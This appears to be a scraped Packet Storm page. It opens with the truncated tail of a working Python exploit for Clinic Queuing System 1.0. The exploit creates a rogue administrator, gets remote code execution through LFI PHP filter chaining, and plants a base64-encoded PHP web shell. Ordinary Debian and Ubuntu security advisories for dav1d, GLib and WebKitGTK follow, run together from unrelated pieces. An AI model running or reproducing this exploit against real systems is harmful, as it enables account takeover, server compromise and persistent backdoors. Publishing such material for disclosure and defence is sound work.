t.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Debian Linux Security Advisory 5686-1 - Nick Galloway discovered an integer overflow in dav1d, a fast and small AV1 video stream decoder which could result in memory corruption.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5686-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 09, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : dav1dCVE ID         : CVE-2024-1580Nick Galloway discovered an integer overflow in dav1d, a fast and smallAV1 video stream decoder which could result in memory corruption.For the oldstable distribution (bullseye), this problem has been fixedin version 0.7.1-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.0.0-2+deb12u1.We recommend that you upgrade your dav1d packages.For the detailed security status of dav1d please refer toits security tracker page at:https://security-tracker.debian.org/tracker/dav1dFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmY84YwACgkQEMKTtsN8TjbRiRAAvuyxl16M5vv5sRP7cBXJOG1AXtEAmw7uId5GNiRIrIPPs9JuP8fPBqxH+tasEIF7Il88KgSKDt+ZYa2R3iG57KQNjTxCvZ5XZ9rlOhb1C1Z69Qm7beYXFpTasygIteKYzvrW3qvcDvmqsYuLd8ZDIPFhLeb5XbBdm2a+vE1dhvdyYwMj+MZP2Sq7ZwCEd/ez6pKhsrZZjOWcoDeH/64CBnpNy/tpXW1KDvS0TsfWdlJbvG+3USBNaGq9rk+jc1XKcKlYmPV4VKxrlUvuWFGv+s99pPNGWhE8Xf84DlssGj2Hi+m6QUHSfqxBtf+YiArHjLPihgW8CGnNZ7vJBAjUO26pwwxZcx6AemsjyJAynqcd9c38SDDwvTZuka+mhJwZbrVcJqe5NU2jmrbzV6RpJtTzmCeZwuvSlmUxH36p9fVYhEIaeflaRtIidDnnVo2ervwAKPDfVnIt+X6bHnF6m+GGIw8I1+6RhNulUQhwivNtbGXhp/9vf3e1TmDr0awyY2yG7v2Qv1SSzQGQA4W5ARMb/DliFFZTpvRDzEp1iuVyduPO0y8bWORNhIsAjirq1DhzHBxquZY4tHBi3AfoVGO09Yh3ZE/KyMP/98P5XU3gH4xLsz3PziHH15GWSpxkcjgFblNOYdtYrp4K+8YC0fB7cuKEIWaHRO5CCgx/UHsYhW-----END PGP SIGNATURE-----

Debian Security Advisory 5686-1

Ubuntu Security Notice 6768-1 - Alicia Boya García discovered that GLib incorrectly handled signal subscriptions. A local attacker could use this issue to spoof D-Bus signals resulting in a variety of impacts including possible privilege escalation.

==========================================================================  
Ubuntu Security Notice USN-6768-1  
May 09, 2024

glib2.0 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

GLib could be made to accept spoofed D-Bus signals.

Software Description:  
- glib2.0: GLib library of C routines

Details:

Alicia Boya García discovered that GLib incorrectly handled signal  
subscriptions. A local attacker could use this issue to spoof D-Bus signals  
resulting in a variety of impacts including possible privilege escalation.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libglib2.0-0t64                 2.80.0-6ubuntu3.1  
   libglib2.0-bin                  2.80.0-6ubuntu3.1

Ubuntu 23.10  
   libglib2.0-0                    2.78.0-2ubuntu0.1  
   libglib2.0-bin                  2.78.0-2ubuntu0.1

Ubuntu 22.04 LTS  
   libglib2.0-0                    2.72.4-0ubuntu2.3  
   libglib2.0-bin                  2.72.4-0ubuntu2.3

Ubuntu 20.04 LTS  
   libglib2.0-0                    2.64.6-1~ubuntu20.04.7  
   libglib2.0-bin                  2.64.6-1~ubuntu20.04.7

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6768-1  
   CVE-2024-34397

Package Information:  
   https://launchpad.net/ubuntu/+source/glib2.0/2.80.0-6ubuntu3.1  
   https://launchpad.net/ubuntu/+source/glib2.0/2.78.0-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/glib2.0/2.72.4-0ubuntu2.3  
   https://launchpad.net/ubuntu/+source/glib2.0/2.64.6-1~ubuntu20.04.7

Ubuntu Security Notice USN-6768-1

Debian Linux Security Advisory 5684-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Kacper Kwapisz discovered that visiting a malicious website may lead to address bar spoofing. Nan Wang and Rushikesh Nandedkar discovered that processing maliciously crafted web content may lead to arbitrary code execution. SungKwon Lee discovered that processing web content may lead to a denial-of-service. Various other issues were also addressed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5684-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 09, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42843 CVE-2023-42950 CVE-2023-42956 CVE-2024-23252  
                 CVE-2024-23254 CVE-2024-23263 CVE-2024-23280 CVE-2024-23284

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42843

    Kacper Kwapisz discovered that visiting a malicious website may  
    lead to address bar spoofing.

CVE-2023-42950

    Nan Wang and Rushikesh Nandedkar discovered that processing  
    maliciously crafted web content may lead to arbitrary code  
    execution.

CVE-2023-42956

    SungKwon Lee discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23252

    anbu1024 discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23254

    James Lee discovered that a malicious website may exfiltrate audio  
    data cross-origin.

CVE-2024-23263

    Johan Carlsson discovered that processing maliciously crafted web  
    content may prevent Content Security Policy from being enforced.

CVE-2024-23280

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23284

    Georg Felber and Marco Squarcina discovered that processing  
    maliciously crafted web content may prevent Content Security  
    Policy from being enforced.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.44.1-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.1-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmY8e60ACgkQAAyEYu0C  
2ALK/g/7BzT5OfeZ1/2nK7TVdiyOjPuQgoZBqIV1LAmUBy5gHvKjOtrujqI9pVaU  
DZtGhgfRwu2AZjAvR1A5gCNTwWyGhvFrLN23/BaloxcveYr6iY6HuYFymlQp24fM  
o35x8DQJySgO3cGmNR1GwwLatr3dVrHh+Kot1J449G4mqlQxH4UQ8ytWOSfpWLdZ  
3ndArvVrO35eBUgPbUEooPHITSlusZQPbaVJkmU69zbpW1z220sQldSmObWHbAGG  
41NHl74LMqe64tI5EfrgSwdY7L+FEby/M0JlO37e1Hut0WpQckHuNgrlq6IO20Ed  
h80kmkN91TDCihQ1vovZaTbg9bCYcSYCWBxPGomip1v8EL1AybO8c7pEI/v/lcVO  
x4Ya6++JrJ1994U5esZB7VC0ucEUOc0SqwARyHv6NMmkKxxIPv2YdqPFE196x2Ns  
1rTM6dMriuCaKLOb2WUtOawLKPnBNQ0dRS1JLcNDA1Dy9zbDDB6ev8idKnixRMbv  
EOyZjBm8RTBK7dGw0BlTdHAoCZvczQJvinAJptvL+771qwcwq7SaL+6L1Ht1MGcN  
WS+wrb+DzpSvfprtv5Qvs0NEpmGISwbK3T/XOEnyyKMQdhemNtpvjWvF+0WNBf/d  
3nPAa5F9ZxJJMEuJFjAmm/HiK3R6Uko899yBtNbDkJbbA+vQlM8=MdSz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5684-1

Debian Linux Security Advisory 5682-2 - The update for glib2.0 released as DSA 5682-1 caused a regression in ibus affecting text entry with non-trivial input methods. Updated glib2.0 packages are available to correct this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5682-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 09, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : glib2.0  
Debian Bug     : 1070730 1070736 1070743 1070745 1070749 1070752

The update for glib2.0 released as DSA 5682-1 caused a regression in  
ibus affecting text entry with non-trivial input methods. Updated  
glib2.0 packages are available to correct this issue.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.66.8-1+deb11u3.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.74.6-2+deb12u2.

We recommend that you upgrade your glib2.0 packages.

For the detailed security status of glib2.0 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/glib2.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmY8V7JfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RJGA/+IOsDXWcvXMOYEueKNZ+pIFVXLbT4GVMBvUIBf0wqJFbnmwaTXaEojqNR  
HKFcCLIBKzhHkJvCmhaEsaZXj05GxI0jIKV0CULuEl1PeYpXaypIF0BIbtH7Jd0j  
Q7/3qQgafewuJgqwn7e3CG9mF8oZv/QfwH4VPaJMkMd7cdRNytKOiJosg2ZEl3FK  
ycO/t58SMPxApzY5eebAU/u37UKAzI7PeCIz9FaCUQdwMUFuUeJvsYD21PwxYN/R  
LK79UsnHiw6sr3cpNirOhm7F3HXSh7WFBqQdcLGrTaix3X+RKW7NymNhIW8m7qWg  
kJ7w6JArMuvxj2Y2RiBF0eqVVkYcTHOe964+nvDHjzFIUkLU0yhw2GLhK4GzbWjl  
VpXc/+Rv1I9OsFF4SiKNSbi728NM4GUS3ziew//1l9EPM281UrCDoFRkwi1FP2jT  
KVWB0CZacqLmo62cT49HBb1rSxDXSEi0qc0yMKus+Jk+NT8H1k+cpjrK5hy0flJt  
JJWTOJMJ2Ph7LvLbrfsVoeuxeIz+taoLz6JW5dkpk1/LkxSmZkIKztdolirONMqF  
vBCTyz7IvBxqro5+vRsBnSFPJdw4pCVxhfgI/BFIUe8dA2Sh8bE+o69wTgcGDst5  
ZHf28D3hClhMSc/SgotNTUf8KycA15VjxhvNtAeFL0HpOvAKiKI=T+EA  
-----END PGP SIGNATURE-----

Source

Packet Storm